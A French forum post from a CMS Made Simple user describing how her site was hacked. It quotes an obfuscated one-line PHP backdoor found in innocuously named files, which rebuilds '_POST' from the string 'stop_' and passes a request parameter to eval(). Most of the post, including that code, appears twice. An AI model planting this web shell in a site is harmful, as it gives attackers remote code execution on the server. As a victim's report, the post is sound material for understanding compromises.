14/01/2015, 19:32:07
Je viens de regarder les fichiers PHP que j'avais récupéré, ils sont nommés : blog.php, proxy.php ou sql.php, il y en avait d'autres avec des noms très banals aussi.
Un ex du code contenu dans ces fichiers :
[ins]<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q7f69dd'])){eval(${$s20}['q7f69dd']);}?>[/ins]
en faisant une recherche sur ces fichiers, j'ai trouvé cet article qui, je trouve, illustre très bien ce qui vient d'arriver à mon site.
Ce n'est pas très rassurant car il n'y a apparemment pas vraiment de solutions une fois qu'on est infecté. A part la mise à jour que je viens de faire, l'auteur de l'article conseille de décortiquer la BDD, un travail de fourmi !!!
J'ai aussi mis en place tous les conseils de sécurité évoqués ici
bref cet épisode m'aura servi de leçon quant à la sécurité des sites.
Depuis le temps que j'utilise CMSMS, j'en suis toujours satisfaite, vivement la V2 !
Un ex du code contenu dans ces fichiers :
[ins]<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q7f69dd'])){eval(${$s20}['q7f69dd']);}?>[/ins]
en faisant une recherche sur ces fichiers, j'ai trouvé cet article qui, je trouve, illustre très bien ce qui vient d'arriver à mon site.
Ce n'est pas très rassurant car il n'y a apparemment pas vraiment de solutions une fois qu'on est infecté. A part la mise à jour que je viens de faire, l'auteur de l'article conseille de décortiquer la BDD, un travail de fourmi !!!
J'ai aussi mis en place tous les conseils de sécurité évoqués ici
bref cet épisode m'aura servi de leçon quant à la sécurité des sites.
Depuis le temps que j'utilise CMSMS, j'en suis toujours satisfaite, vivement la V2 !